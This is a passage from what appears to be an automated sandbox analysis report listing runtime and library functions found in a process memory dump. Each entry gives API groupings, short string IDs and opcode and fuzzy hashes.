                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3213D3A619740C3EB509B25E59A35973A0F789BE4F50C215EA6D06BA9DFBCC189CF00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                                      • Instruction ID: 9bc5a333917bf80fd968e05934bc567343bc4708580eaa4f1e8f9a2e5a27b964
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02E1907A6167408AEBA0DF65D48A39D77A0F749B98F10C115FEAD5BB5ACF38C089C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                                      • Instruction ID: 17d4fd8409afe9c248ff9fe60d3c2a89b5829e2bf12111ef7b2ee945664a58ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A41D82A317A0091FB96DB26A88A7557391F74DFE0F55C126ED2D8B786EF38C44D8300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                                                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                      • Instruction ID: 0d68b02ae67671f857516eecb0848f9714f5d760cf27ad3bd8b0b321f4de517c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79417177615B84C6E7A0CF21E48939E77A1F389F98F44C115EA9A0B759DF38C589CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D087
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0A6
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0CE
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0DF
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0F0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                      • String ID: 1%$Y%
                                                                                                                                                                                                      • API String ID: 3702945584-1395475152
                                                                                                                                                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                                      • Instruction ID: 508e0f7abfabd1e83ed6e9d602a77b852fec6b871bcf21c5731b16c6c3b63ebd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A811296860624842FBE8B73669DB36962415F8CBA0F54D324F87D5E6EBDE68C40A8300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092387510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 190073905-0
                                                                                                                                                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                                      • Instruction ID: c59a68f37da5fcd38c13db7e9c43383aab0ea90acc3110028211fabad8b42c56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39817E2D60364186FBD4DB6998CB3A96292AB8DF80F14C425F97D4B797EF78C84D8700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092389DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                                      • Instruction ID: 53c3d0c237e81dda78ce487c373411d963f88852fce3ba3e19670fa051cc19a3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E31E62A313A40E1EFA1DB02A98A7656794B74CFA0F59C525EE3D0F792DF39D48D8700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092393DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                                      • Instruction ID: 87c04f276bf234bb12083d871c6ed8e9f08ee61aa6c46c42272f5164b1e321f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11B63D716B40C2E7908B12E88931972A4F78DFE4F04C224EA6D877A6CF78C458CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092382F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                      • String ID: dialer
                                                                                                                                                                                                      • API String ID: 756756679-3528709123
                                                                                                                                                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                                      • Instruction ID: 39afe3ddd6e6d097b45cd4de5d81cf374d4bc5a978f8d31865c8414a9fdac7dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31812A703B5582EB95DF17A58A76967A0FB48F84F08C120EE5D4BB57EF34C4A9C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                                      • Instruction ID: 5266cd08fac6005184ef1348c82c0eaa1e8f4704349bffd67690afbb6ad547b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01115C2C20324482FBE8A73155DF32962426B8CFF4F54C724F87E5E6E7DE6884098700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 517849248-0
                                                                                                                                                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                                      • Instruction ID: 29e0ebf9dfd58fbeb2982f728eac6f33a9a06f10bc25bb9a1a85be3c82a0978c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67015B29702A4082EB90DB52E49935963A1F78DFC0F48C035DEAE43766DE7CC58ECB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 449555515-0
                                                                                                                                                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                                      • Instruction ID: 620cabbc7c02fe0baf70140da816195882e94c90b305abdd921547fc3a1f19ba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B011B6D617B40C2EBA49B22E88E71572A0BB4DFC6F04C425D96D07766EF7DC14C8B00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092388FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                                                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                                                                      • Instruction ID: cab1018f037914e8374d0607161d5a41f4c1305bd99ef49bf0057c0f5e905668
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651B13A7066008AEB94CF15E88DB693796F348FC8F51C524EB6A4B74ADF75C94AC700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092381A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                      • String ID: \\?\
                                                                                                                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                                                                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                                      • Instruction ID: 77bf96414c871147b412229e64955f9692535b18de8a8e4c6af6d15e64c58984
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFF0AF6A305680D2EBA09B21F8C93596360F74DFC8F94C020DAAD4A966DF7CC68DCB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                                      • Instruction ID: da78497f32208a10e606192a29494fc326e245c6655d93fbe275253205ff8263
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3F0626D213605C2EB508B24E8CE3596321EB8EFA1F54C219DA7E492F6DF6CC48D8700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092383044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CombinePath
                                                                                                                                                                                                      • String ID: \\.\pipe\
                                                                                                                                                                                                      • API String ID: 3422762182-91387939
                                                                                                                                                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                                      • Instruction ID: fe481a6a832e91e1b0a972e284cfd228bfdc39b99d3a405373212e3135b22ae7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF05E6C606B84C2EB809B13B9891196260AB4DFC0F08C120EE6E07B2ADF6CC4898B00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092385710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                      • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                                                                      • Instruction ID: e876196aa6d2855d9486036f54fd059ebd800e97bb5603dcdf946595053b7c85
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F61AB3A61AA44C6E7A0CB15E48931A77B0F388B94F51D116FADE47BA9DF7CC448CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092394104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                      • Instruction ID: 9df09107c09c3dbcb0a4f5d01aad4cda4688fd256b6f3375119177dd15073b35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4211983EA15A5092F7E41558D5EF36511406B6FBB4F08C624E77E267D78EA8C4CE4700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                                      • Instruction ID: 0b9e66c092d5353bd90ac7823ab4196f3369b9b2a0ece46c9412d5aad13bc16c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8061693B612B848AEB60DF65D48539D77A0F348B88F048215EF6D1BB9ADF78C599C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                                      • Instruction ID: aecec427920cf964f2c500dee6c23b4f90442e7d901555835a7b87036198dd57
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11519E7B122780CAEBB48B1594CA35977A0F358F85F14C116FAAD4BB96CF38D4A8C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092392058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                                      • Instruction ID: dc3952f9b1b36ae91d7bf0c8d025bc04fe7a2e0d4c3bd89bf2b147d8f58767b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0ED1123A706A80C9E755CF6AD48539C3BB1F34AB98F00C216DE6D97B9ADE74C44AC740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923814A4 Relevance: 6.3, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$Free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168794593-0
                                                                                                                                                                                                      • Opcode ID: 67b040d7ee802606bd56d07f6ed8f9806d413318a069c895cd09d0520baf0e98
                                                                                                                                                                                                      • Instruction ID: 0de66cf9629e314cb73f369278df029e6b34802edab9867acc8c101c11f046c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b040d7ee802606bd56d07f6ed8f9806d413318a069c895cd09d0520baf0e98
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8611903EA06A90CAE790DB62D88924967A0F74EFC0F04C025DB6D43727DE38C0998B00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092392980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                                      • Instruction ID: c0e4e2bb94459c3927f15c6b93068607d186b0e1c8a0db24b365ca452b44f6ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E891D67E702A50C5F7989F7694CA3AD2BA0B70AF88F14C105DE2E57696DEB4C4CAC700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000002809238253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileType
